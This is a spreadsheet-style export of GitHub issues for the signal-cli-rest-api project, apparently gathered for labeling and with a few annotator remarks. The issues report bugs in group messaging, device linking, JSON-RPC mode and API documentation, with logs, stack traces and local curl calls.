    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/91</t>
  </si>
  <si>
    <t>Unable to send message to group I am a member of</t>
  </si>
  <si>
    <t>Hi, My account became deregistered and I went ahead and reregistered it without issue. However now I am unable to send to the group I was a member of. I can list the group fine with `curl -X GET -H "Content-Type: application/json" 'http://127.0.0.1:8080/v1/groups/+10000000000'` returns `[{"name":"group1 Notifications","id":"group.77777777777777777777777777777777","internal_id":"11111111111111==","members":["+10000000000","+11111111111","+12222222222","+13333333333"],"blocked":false,"pending_invites":[],"pending_requests":[],"invite_link":""}]` When I use the group id above, the call always returns "null"  curl -X POST -H "Content-Type: application/json" -d '{"message": "Ignore test", "number": "+10000000000", "recipients": ["group.77777777777777777777777777777777"]}' 'http://127.0.0.1:8080/v2/send'  `null` In the logs it looks like both the GET and POST calls are getting 20x response  [GIN] 2021/02/12 - 03:03:48 | 200 | 160.107s | 10.42.1.1 | GET "/v1/about" [GIN] 2021/02/12 - 03:03:56 | 201 | 7.721459399s | 10.42.1.1 | POST "/v2/send"</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/95</t>
  </si>
  <si>
    <t>QRCode link: please provide a name for a device</t>
  </si>
  <si>
    <t>So I installed signal-cli-rest-api ad addon on my Home Assistant and when I go to `http://192.168.200.245:8080/v1/about` I get nice message:  { "versions": [ "v1", "v2" ], "build": 2 }  Now I want to register additional device to my existing signal number So I say: `http://192.168.200.245:8080/v1/qrcodelink`. Documentation says "No parameters". Unfortunately I get this:  { "error": "Please provide a name for the device" }  Any help on this?</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/103</t>
  </si>
  <si>
    <t>No serializer found for class org.asamk.signal.json.JsonSyncMessage and no properties discovered to create BeanSerializer</t>
  </si>
  <si>
    <t>On /receive { error: "WARN ReceiveCommand - "--json" option has been deprecated, please use the global "--output=json" instead. Failed to send/receive message (Assertion): com.fasterxml.jackson.databind.exc.InvalidDefinitionException: No serializer found for class org.asamk.signal.json.JsonGroupInfo and no properties discovered to create BeanSerializer (to avoid exception, disable SerializationFeature.FAIL_ON_EMPTY_BEANS) (through reference chain: java.util.HashMap["envelope"]-&gt;org.asamk.signal.json.JsonMessageEnvelope["dataMessage"]-&gt;org.asamk.signal.json.JsonDataMessage["groupInfo"]) java.lang.AssertionError: com.fasterxml.jackson.databind.exc.InvalidDefinitionException: No serializer found for class org.asamk.signal.json.JsonGroupInfo and no properties discovered to create BeanSerializer (to avoid exception, disable SerializationFeature.FAIL_ON_EMPTY_BEANS) (through reference chain: java.util.HashMap["envelope"]-&gt;org.asamk.signal.json.JsonMessageEnvelope["dataMessage"]-&gt;org.asamk.signal.json.JsonDataMessage["groupInfo"]) at org.asamk.signal.JsonWriter.write(JsonWriter.java:32) at org.asamk.signal.JsonReceiveMessageHandler.handleMessage(JsonReceiveMessageHandler.java:37) at org.asamk.signal.manager.Manager.receiveMessages(Manager.java:1782) at org.asamk.signal.commands.ReceiveCommand.handleCommand(ReceiveCommand.java:168) at org.asamk.signal.App.handleLocalCommand(App.java:211) at org.asamk.signal.App.init(App.java:169) at org.asamk.signal.Main.main(Main.java:43) Caused by: com.fasterxml.jackson.databind.exc.InvalidDefinitionException: No serializer found for class org.asamk.signal.json.JsonGroupInfo and no properties discovered to create BeanSerializer (to avoid exception, disable SerializationFeature.FAIL_ON_EMPTY_BEANS) (through reference chain: java.util.HashMap["envelope"]-&gt;org.asamk.signal.json.JsonMessageEnvelope["dataMessage"]-&gt;org.asamk.signal.json.JsonDataMessage["groupInfo"]) at com.fasterxml.jackson.databind.SerializerProvider.reportBadDefinition(SerializerProvider.java:1191) at com.fasterxml.jackson.databind.DatabindContext.reportBadDefinition(DatabindContext.java:313) at com.fasterxml.jackson.databind.ser.impl.UnknownSerializer.failForEmpty(UnknownSerializer.java:71) at com.fasterxml.jackson.databind.ser.impl.UnknownSerializer.serialize(UnknownSerializer.java:33) at com.fasterxml.jackson.databind.ser.BeanPropertyWriter.serializeAsField(BeanPropertyWriter.java:727) at com.fasterxml.jackson.databind.ser.std.BeanSerializerBase.serializeFields(BeanSerializerBase.java:719) at com.fasterxml.jackson.databind.ser.BeanSerializer.serialize(BeanSerializer.java:155) at com.fasterxml.jackson.databind.ser.BeanPropertyWriter.serializeAsField(BeanPropertyWriter.java:727) at com.fasterxml.jackson.databind.ser.std.BeanSerializerBase.serializeFields(BeanSerializerBase.java:719) at com.fasterxml.jackson.databind.ser.BeanSerializer.serialize(BeanSerializer.java:155) at com.fasterxml.jackson.databind.ser.std.MapSerializer.serializeFields(MapSerializer.java:722) at com.fasterxml.jackson.databind.ser.std.MapSerializer.serialize(MapSerializer.java:643) at com.fasterxml.jackson.databind.ser.std.MapSerializer.serialize(MapSerializer.java:33) at com.fasterxml.jackson.databind.ser.DefaultSerializerProvider._serialize(DefaultSerializerProvider.java:480) at com.fasterxml.jackson.databind.ser.DefaultSerializerProvider.serializeValue(DefaultSerializerProvider.java:319) at com.fasterxml.jackson.databind.ObjectMapper._configAndWriteValue(ObjectMapper.java:3906) at com.fasterxml.jackson.databind.ObjectMapper.writeValue(ObjectMapper.java:3202) at org.asamk.signal.JsonWriter.write(JsonWriter.java:29)  6 more If you use an Oracle JRE please check if you have unlimited strength crypto enabled, see README " }</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/135</t>
  </si>
  <si>
    <t>Scheduler uses hard coded port 8080</t>
  </si>
  <si>
    <t>I installed signal-cli-rest-api recently. I needed to change the port, because 8080 was already used. It worked, but I noticed crashed in the docker logs.  time="2021-05-22T08:49:00+02:00" level=error msg="AUTO_RECEIVE_SCHEDULE: Couldn't call receive for number +49XXXX: Get \"http://127.0.0.1:8080/v1/receive/+49XXXX\": dial tcp 127.0.0.1:8080: connect: connection refused" panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x5b1ce8] goroutine 10 [running]: main.main.func1.1(0x1f00440, 0x31, 0x7d2330, 0x1cfa6c0, 0x0, 0x0, 0xe36d8, 0x1cfa6c0) /tmp/signal-cli-rest-api-src/main.go:175 +0x134 path/filepath.walk(0x1f00440, 0x31, 0x7d2330, 0x1cfa6c0, 0x6ed460, 0x0, 0x0) /usr/local/go/src/path/filepath/path.go:360 +0x308 path/filepath.walk(0x1c921b0, 0x22, 0x7d2330, 0x1cfa630, 0x6ed460, 0x0, 0x0) /usr/local/go/src/path/filepath/path.go:384 +0x20c path/filepath.walk(0xbec4ae48, 0x1d, 0x7d2330, 0x1cfa120, 0x6ed460, 0x0, 0x0) /usr/local/go/src/path/filepath/path.go:384 +0x20c path/filepath.Walk(0xbec4ae48, 0x1d, 0x6ed460, 0x0, 0x0) /usr/local/go/src/path/filepath/path.go:406 +0xe8 main.main.func1() /tmp/signal-cli-rest-api-src/main.go:167 +0x30 github.com/robfig/cron/v3.FuncJob.Run(0x218c570) /go/pkg/mod/github.com/robfig/cron/v3@v3.0.1/cron.go:136 +0x1c github.com/robfig/cron/v3.(*Cron).startJob.func1(0x1dcc180, 0x7cb188, 0x218c570) /go/pkg/mod/github.com/robfig/cron/v3@v3.0.1/cron.go:312 +0x58 created by github.com/robfig/cron/v3.(*Cron).startJob /go/pkg/mod/github.com/robfig/cron/v3@v3.0.1/cron.go:310 +0x58  The port is still 8080 in the scheduler call. This can also be seen in the source:  log.Debug("AUTO_RECEIVE_SCHEDULE: Calling receive for number ", filename) resp, err := http.Get("http://127.0.0.1:8080/v1/receive/"+filename)  (https://github.com/bbernhard/signal-cli-rest-api/blob/master/src/main.go#L171)</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/175</t>
  </si>
  <si>
    <t>Swagger documentation of HTTP success status codes is incorrect?</t>
  </si>
  <si>
    <t>The problem I barely understand the Go language, but looking at [api.go](https://github.com/bbernhard/signal-cli-rest-api/blob/master/src/api/api.go), I can see multiple endpoints that result in c.Status(http.StatusNoContent), which should be status code 204, when not erroring out, but their Swagger documentation lists them with code 200. A quick test confirmed that successful requests indeed give status 204 on my end. These endpoints are: - [/v1/configuration](https://github.com/bbernhard/signal-cli-rest-api/blob/2d80ff91a2463fa370c12a65b62b7bc0c81c3dbb/src/api/api.go#L749) (POST) - [/v1/groups/{number}/{groupid}/block](https://github.com/bbernhard/signal-cli-rest-api/blob/2d80ff91a2463fa370c12a65b62b7bc0c81c3dbb/src/api/api.go#L805) - [/v1/groups/{number}/{groupid}/join](https://github.com/bbernhard/signal-cli-rest-api/blob/2d80ff91a2463fa370c12a65b62b7bc0c81c3dbb/src/api/api.go#L838) - [/v1/groups/{number}/{groupid}/quit](https://github.com/bbernhard/signal-cli-rest-api/blob/2d80ff91a2463fa370c12a65b62b7bc0c81c3dbb/src/api/api.go#L871) The newly introduced /v1/typing-indicator/{number} endpoints also result in c.Status(http.StatusNoContent), but the documentation has them listed with status code 201. However, I haven't been able to test this yet. I apologize if there's just something that I'm missing because I don't know a lot about the Go language. But in case this is just an oversight in the documentation, I wanted to point this out. :)  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? armv7  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/177</t>
  </si>
  <si>
    <t>/v1/groups/{number}/{groupid}/block endpoint does not do anything (JSON-RPC)</t>
  </si>
  <si>
    <t>The problem This is the debug log:  time="2021-11-01T19:24:49+01:00" level=debug msg="full command: {\"jsonrpc\":\"2.0\",\"method\":\"updateGroup\",\"id\":\"983f3b8b-13f0-48f7-a771-8db6329922f6\",\"params\":{\"groupId\":\"&lt;id&gt;\"}}" [GIN] 2021/11/01 - 19:24:49 | 204 | 4.440421ms | 192.168.X.Y | POST "/v1/groups/+49&lt;number&gt;/group.&lt;id&gt;/block"  This looks like an updateGroup call without any meaningful parameters, and indeed the group is not blocked afterwards:  { "name": "Testgruppe X", "id": "group.&lt;id&gt;", "internal_id": "&lt;id&gt;", "members": [ "+49&lt;number 1&gt;", "+49&lt;number 2&gt;" ], "blocked": false, "pending_invites": [], "pending_requests": [], "invite_link": "" },  To my understanding, [this](https://github.com/AsamK/signal-cli/blob/master/run_tests.sh#L106) is what the command should look like. I tried to test this, but signal-cli told me "This command doesn't work on linked devices." so it looks like I can't verify on my host. Writing this out made me notice that the command was never gonna work via the API in the first place (as it is a linked device). However, the debug log still looks wrong.  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? armv7  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/187</t>
  </si>
  <si>
    <t>v1/groups/{phone#] API endpoint returning Go struct error</t>
  </si>
  <si>
    <t>The problem Steps to reproduce:  curl -X GET -H "Content-Type: application/json" 'http://192.168.86.44:8080/v1/groups/+15853710007' &gt; out.json &amp;&amp; python -m json.tool out.json | less  And getting this response:  { "error": "json: cannot unmarshal object into Go struct field SignalCliGroupEntry.pendingMembers of type string" }  I would expect to get the regular JSON output with the content of the groups.  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/190</t>
  </si>
  <si>
    <t>Link device API fails to link the device</t>
  </si>
  <si>
    <t>When I tried to link my existing number to the signal cli running in a docker container using link device API, every-time after the QR scan, signal android app gave "No device found" or "Network error" toast and was failing to link the number. After searching through the internet I found similar issue reported here within another issue mentioned in below link: https://github.com/bbernhard/signal-cli-rest-api/issues/95#issuecomment-780006579 Since only workaround was given there which takes a while to search and apply, I'm raising this issue here again so it gets fixed and gets the link device API working.</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/224</t>
  </si>
  <si>
    <t>json-rpc mode doesn't work with existing linked devices</t>
  </si>
  <si>
    <t>The problem I created a linked device using native mode, but when I swapped to json-rpc mode and tried to send a message, I received the following error: `{"error":"Number not registered with JSON-RPC"}%` The docker logs show the following when starting up in json-rpc mode:  today at 20:29:26+ set -e today at 20:29:26+ [ -z /home/.local/share/signal-cli ] today at 20:29:26+ usermod -u 1000 signal-api today at 20:29:26usermod: no changes today at 20:29:26+ groupmod -g 998 signal-api today at 20:29:26+ chown 1000:998 -R /home/.local/share/signal-cli today at 20:29:26+ cat today at 20:29:26+ cap_prefix=-cap_ today at 20:29:26+ cat /proc/sys/kernel/cap_last_cap today at 20:29:26+ seq -s ,-cap_ 0 40 today at 20:29:26+ caps=-cap_0,-cap_1,-cap_2,-cap_3,-cap_4,-cap_5,-cap_6,-cap_7,-cap_8,-cap_9,-cap_10,-cap_11,-cap_12,-cap_13,-cap_14,-cap_15,-cap_16,-cap_17,-cap_18,-cap_19,-cap_20,-cap_21,-cap_22,-cap_23,-cap_24,-cap_25,-cap_26,-cap_27,-cap_28,-cap_29,-cap_30,-cap_31,-cap_32,-cap_33,-cap_34,-cap_35,-cap_36,-cap_37,-cap_38,-cap_39,-cap_40 today at 20:29:26+ [ json-rpc = json-rpc ] today at 20:29:26+ /usr/bin/jsonrpc2-helper today at 20:29:26+ service supervisor start today at 20:29:27Starting supervisor: supervisord. today at 20:29:27+ supervisorctl start all today at 20:29:28+ exec setpriv --reuid=1000 --regid=998 --init-groups --inh-caps=-cap_0,-cap_1,-cap_2,-cap_3,-cap_4,-cap_5,-cap_6,-cap_7,-cap_8,-cap_9,-cap_10,-cap_11,-cap_12,-cap_13,-cap_14,-cap_15,-cap_16,-cap_17,-cap_18,-cap_19,-cap_20,-cap_21,-cap_22,-cap_23,-cap_24,-cap_25,-cap_26,-cap_27,-cap_28,-cap_29,-cap_30,-cap_31,-cap_32,-cap_33,-cap_34,-cap_35,-cap_36,-cap_37,-cap_38,-cap_39,-cap_40 signal-cli-rest-api -signal-cli-config=/home/.local/share/signal-cli today at 20:29:28time="2022-03-03T20:29:28Z" level=info msg="Started Signal Messenger REST API" today at 20:29:59[GIN] 2022/03/03 - 20:29:59 | 204 | 300.586s | 192.168.199.105 | POST "/v1/configuration" today at 20:30:09[GIN] 2022/03/03 - 20:30:09 | 400 | 172.809s | 192.168.199.105 | POST "/v2/send"   Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/236</t>
  </si>
  <si>
    <t>Setting name, avatar doesn't update name</t>
  </si>
  <si>
    <t>The problem I'm in rpc-json mode and want to change the username my contacts are seeing. When i send a put request to the endpoint, i get 204 back and after about 1 minute, the avatar is update, but i still only see the phone number as the "username" in signal messenger on my phone. Is this an issue with this client or is there something i'm doing wrong?  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/242</t>
  </si>
  <si>
    <t>Unable to deregister flawed phone number, high CPU likely result</t>
  </si>
  <si>
    <t>The problem I noticed a constant 26%CPU of the Signal Messenger Addon in Homey using json-rpc, and traced the most likely cause to a failed attempt to register a phone number that was missing the area code. The log is riddled with messages: "Couldn't read data for number +\&lt;badphonenumber\&gt;: EOF. Is the number properly registered?" To fix it I tried to deregister the bad phone number by calling the rest api. But I cannot, because that results in an error: user +\&lt;badphonenumber\&gt; is not registered. If I switch to normal or native mode the high load isn't there, but I want to use the faster json-rpc. That also produces errors: "AUTO_RECEIVE_SCHEDULE: Couldn't call receive for number +&lt;badphonenumber&gt;: {User +\&lt;badphonenumber\&gt; is not registered.\n}" How can I remove the bad number (leaving the working registration intact), and hopefully return to a low, acceptable CPU usage? Platform is an RPI4, running version 0.59.0 of the addon, using json-rpc mode and running on HA version 2022.5.3  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? Home Assistant Signal Addon  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? arm64  Additional information _No response_</t>
  </si>
  <si>
    <t xml:space="preserve">contains a state "to fix it I tried to deregister the bad phone number by calling the rest api. But I cannot, because that results in an error: user +&lt;badphonenumber&gt; is not registered." </t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/369</t>
  </si>
  <si>
    <t>Search endpoint broken with multiple accounts</t>
  </si>
  <si>
    <t>The problem I have 2 Signal accounts registered on the server (version 0.66). When trying to use `/v1/search`, the following error is returned: `Multiple users found, you need to specify an account (phone number) with -a\n` Directly using signal-cli-native from within the container works when supplying one of the registered accounts with the -a parameter like suggested in the error message. Maybe the search endpoint could be changed to to `/v1/search/{number}`?  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information This issue was previously mentioned in a feature request: [Search for registered numbers with specific account for multiple users #253](253)</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/387</t>
  </si>
  <si>
    <t>Delete group</t>
  </si>
  <si>
    <t>The problem I created a group with only one memeber and an empty name: `curl -X POST -H "Content-Type: application/json" -d '{"name": "", "members": ["+123456789012"]}' 'http://localhost:8080/v1/groups/+123456789012'` Now I want to delete the group. This group is not displayed in the Signal, but it is displayed on request: `curl -X GET -H "Content-Type: application/json" 'http://localhost:8080/v1/groups/+123456789012'` For delete the group I am executing the command in Docker terminal: `curl -X DELETE -H "Content-Type: application/json" 'http://localhost:8080/v1/groups/+123456789012/group.dHlV0QT0='` or `curl -X DELETE -H "Content-Type: application/json" 'http://localhost:8080/v1/groups/+380978483884/dHlV0QT0='` but groups are not removed, although I don't get an error, just an empty string in the response. I still see these groups on request: `curl -X GET -H "Content-Type: application/json" 'http://localhost:8080/v1/groups/+123456789012'`  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/402</t>
  </si>
  <si>
    <t>Cannot encode QR code: content too large for fixed size QR Code version 10</t>
  </si>
  <si>
    <t>The problem I am trying to generate QR code for a new device but getting `{"error":"Couldn't create QR code: Cannot encode QR code: content too large for fixed size QR Code version 10 (encoded length is 1172 bits, maximum length is 976 bits)"}` in response. images: latest-dev / latest ![qrcodelink_device_name=signal-api](https://github.com/bbernhard/signal-cli-rest-api/assets/70468066/1bc14fa5-f214-4f9c-b0ec-b98ee17d06a6)  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/403</t>
  </si>
  <si>
    <t>Actionable information on $stderr goes to nirvana</t>
  </si>
  <si>
    <t>The problem On this line here: https://github.com/bbernhard/signal-cli-rest-api/blob/master/src/client/cli.go#L109 only `cmd.Stderr` but not `cmd.Stdout` is part of the error message. This is unfortunate. Why? When our HTTP client sends a request to `signal-cli-rest-api` all we see is the following response:  {"error":"Failed to send message\n"}  That's it. But if we try to send the same message to the same number again with `signal-cli`, we also see:  Failed to send (some) messages: +49176xxxxxxxx: CAPTCHA proof required for sending to \"+49176xxxxxxxx\", available options \"RECAPTCHA, PUSH_CHALLENGE\" with challenge token \"6002d6d0-0c16-xxxx-xxxx-xxxxxxxxxxxx\", or wait \"86400\" seconds. To get the captcha token, go to https://signalcaptchas.org/challenge/generate.html Check the developer tools (F12) console for a failed redirect to signalcaptcha:// Everything after signalcaptcha:// is the captcha token. Use the following command to submit the captcha token: signal-cli submitRateLimitChallenge --challenge CHALLENGE_TOKEN --captcha CAPTCHA_TOKEN  This message contains the challenge token(!) This is important for the HTTP client because it could throw a specific error and send this information along with it, e.g. via Sentry, to a human to solve the problem. Based on our experience, this error occurs every now and then. Unfortunately it is phone number specific, so sending messages *to another phone number* works **just fine** making it difficult to become aware of this issue. Waiting the specified 86400 seconds does nothing. So we can no longer message that person (bad) and we unaware of it (even worse).  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [ ] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/410</t>
  </si>
  <si>
    <t>setting group_link not having an effect when creating group</t>
  </si>
  <si>
    <t>The problem When creating a group with `"http://127.0.0.1:8080/v1/groups/PHONE_NUMBER"` and `json={'description': 'string', 'group_link': 'enabled', 'members': ['PHONE_NUMBER'], 'name': 'Test', 'permissions': {'add_members': 'only-admins', 'edit_group': 'only-admins'}}` with group_link = enabled the group is created, however 'Group link' remains disabled in the new group.  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [x] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/412</t>
  </si>
  <si>
    <t>Cannot send anything</t>
  </si>
  <si>
    <t>The problem After registering a number on a fresh container with no prior configuration I am not able to send any messages. Command that was run:  curl -X POST -H "Content-Type: application/json" 'http://localhost:8080/v2/send' -d '{"message": "Test via Signal API!", "number": "&lt;sender&gt;", "recipients": [ "&lt;recipient&gt;" ]}'  And the response is:  { "error": "WARN SendHelper - Failed to send message due to IO exception: Unable to parse entity\nFailed to send message\n" }  In the container logs I am seeing:  [GIN] &lt;timestamp&gt; | 400 | 6.6703771s | 10.0.2.100 | POST "/v2/send"   Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information I encountered this issue in all modes, i.e. normal, native and json-rpc. Further, I have a version where a number was registered under version 0.64 and strangely when mounting this configuration directory, I can do everything without any problems..</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/413</t>
  </si>
  <si>
    <t>broken formatting when using styling with multicharacter emojis</t>
  </si>
  <si>
    <t>The problem When sending multicharacter emojis (for example emojis that use a skin color modifier) and styling (bold, italic, etc.), something about the formatting breaks. Depending on the actual message, the emoji will break or the formatting is shifted.  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? json-rpc  What's the architecture of your host system? x86-64  Additional information Multicharacter emoji without styling works. json { "message": "abcdefg", "number": "{{BOT_NUMBER}}", "recipients": [ "{{RECIPIENT_NUMBER}}" ], "text_mode":"styled" }  ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/d1dc669e-6fc3-4954-8d29-a8b8997c7b5e)  When using a multicharacter emoji and then some styled text, the styling is shifted to the left by two characters. The `bc` is now styled bold and `fg` is no longer styled bold. json { "message": "abc**defg**", "number": "{{BOT_NUMBER}}", "recipients": [ "{{RECIPIENT_NUMBER}}" ], "text_mode":"styled" }  ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/bf334463-a88f-4d47-a7c6-0290b0b8473f)  When the styling is less then two characters away, the emoji breaks. *two characters away* json { "message": "ab**cdefg**", "number": "{{BOT_NUMBER}}", "recipients": [ "{{RECIPIENT_NUMBER}}" ], "text_mode":"styled" }  ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/c6efbf80-a323-416c-a82a-806a3213e3af) *one characters away* json { "message": "ab**cdefg**", "number": "{{BOT_NUMBER}}", "recipients": [ "{{RECIPIENT_NUMBER}}" ], "text_mode":"styled" }  ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/dc0cc8da-c970-4b6c-9e72-3f2d2bc75031) *directly after* json { "message": "**abcdefg**", "number": "{{BOT_NUMBER}}", "recipients": [ "{{RECIPIENT_NUMBER}}" ], "text_mode":"styled" }  ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/ff4ec511-b32f-489e-967e-3d7f575b1d14)  Weirdly enough this behaves differently on the Signal Windows Client than on the Android App. The previous screenshots are from the Windows Client, the following from the Android App. In the notification, the issue is not present at all, I guess because the message is stripped of the formatting anyways. ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/557301a0-ea9b-41ec-9ec6-d8bce3c0e168) Here's how the Android App behaves in the chat: ![image](https://github.com/bbernhard/signal-cli-rest-api/assets/49568639/4af4d379-ef07-4f9c-8586-a965405b3187)</t>
  </si>
  <si>
    <t xml:space="preserve">becasue when it send to api , the data format chages , </t>
  </si>
  <si>
    <t>it seems to me a UI error, I can't find any api in issue description or patch</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/425</t>
  </si>
  <si>
    <t>Native mode - arch issue</t>
  </si>
  <si>
    <t>The problem When using signal-cli-rest-api (via Home Assistant add-on) v0.69.0, messages can't be sent or received. Any API called result in a 400 error and the following message:  The current machine does not support all of the following CPU features that are required by the image: [CX8, CMOV, FXSR, MMX, SSE, SSE2, SSE3, SSSE3, SSE4_1, SSE4_2, POPCNT, LZCNT, AVX, AVX2, BMI1, BMI2, FMA]. Please rebuild the executable with an appropriate setting of the -march option.  Appears to be related to the updated native build in the 0.69.0 release. Switching to 'normal' resolves this issue. Issue orignally opened here: https://github.com/haberda/hassio_addons/issues/79  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? Home Assistant Signal Addon  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/466</t>
  </si>
  <si>
    <t>/v1/contacts and /v1/contacts{number}/sync don't seem to work</t>
  </si>
  <si>
    <t>The problem I am running the latest 0.80 version and cannot seem to get the api endpoints for /v1/contacts and /v1/contacts{number}/sync to work. I just get an error 404 returned everytime. Would you be able to provide some sample curl commands and confirm if these endpoints do in fact work in the latest version?  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/489</t>
  </si>
  <si>
    <t>0.142-dev: Unable to start in json-rpc mode</t>
  </si>
  <si>
    <t>The problem When switching to this latest dev image tag, the log output shows the following:  signal | + [ json-rpc = json-rpc ] signal | + /usr/bin/jsonrpc2-helper signal | time="2024-02-23T08:23:22Z" level=info msg="Updated jsonrpc2.yml"  signal | time="2024-02-23T08:23:23Z" level=info msg="Started Signal Messenger REST API" signal | time="2024-02-23T08:23:23Z" level=error msg="Couldn't read data for number &lt;multi-account&gt;: EOF. Is the number properly registered?" signal | [GIN] 2024/02/23 - 08:23:52 | 500 | 99.92s | 172.18.0.10 | GET "/v1/accounts"  Response to `GET /v1/accounts` is json { "error": "Couldn't get list of accounts: write tcp 127.0.0.1:44624-\u003e127.0.0.1:6001: write: broken pipe" }  The updated `jsonrpc2.yml` reads yaml config: &lt;multi-account&gt;: tcp_port: 6001 fifo_pathname: /tmp/sigsocket1   Are you using the latest released version? - [ ] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? arm64  Additional information Only one account is registered in the configuration of the instance.</t>
  </si>
  <si>
    <t xml:space="preserve">discription has endpoint </t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/493</t>
  </si>
  <si>
    <t>Fatal error: concurrent map writes</t>
  </si>
  <si>
    <t>The problem In json-rpc mode, when several clients are connected to `/v1/receive/+000000000000`, the container crashes with an error:  fatal error: concurrent map writes goroutine 58 [running]: github.com/gin-gonic/gin.(*Engine).ServeHTTP(0xc000502ea0, {0xcfdba0?, 0xc000db01c0}, 0xc000da8300) /go/pkg/mod/github.com/gin-gonic/gin@v1.9.1/gin.go:576 +0x1dd net/http.serverHandler.ServeHTTP({0xc0004d0c90?}, {0xcfdba0?, 0xc000db01c0?}, 0x6?) /usr/local/go/src/net/http/server.go:2938 +0x8e net/http.(*conn).serve(0xc0004cfd40, {0xcff6c0, 0xc0004581e0}) /usr/local/go/src/net/http/server.go:2009 +0x5f4 created by net/http.(*Server).Serve in goroutine 1 /usr/local/go/src/net/http/server.go:3086 +0x5cb goroutine 107 [runnable]: internal/syscall/unix.GetRandom({0xc0002d64d0?, 0x10?, 0x10?}, 0x0?) /usr/local/go/src/internal/syscall/unix/getrandom.go:21 +0xbe crypto/rand.getRandom({0xc0002d64d0?, 0x10, 0x0?}) /usr/local/go/src/crypto/rand/rand_getrandom.go:40 +0x1f crypto/rand.init.0.batched.func1({0xc0002d64d0?, 0x0?, 0x0?}) /usr/local/go/src/crypto/rand/rand.go:38 +0x90 